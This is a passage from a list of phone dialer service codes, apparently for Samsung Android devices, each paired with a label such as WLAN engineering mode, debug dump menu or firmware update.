(WLAN Engineering Mode)
*#746#
(Debug Dump Menu)
*#9900#
(System Dump Mode)
*#44336#
(Sofware Version Info)
*#273283*255*663282*#
(Data Create SD Card)
*#3282*727336*#
(Data Usage Status)
*#7594#
(Remap Shutdown to End Call TSK)
*#0289#
(Melody Test Mode)
*#2663#
(TSP / TSK firmware update)
*#528#
(WLAN Engineering Mode)
*#7412365#
(Camera Firmware Menu) or *#*#34971539#*#*
*#80#
(Unknown)
*#07#
(Test History)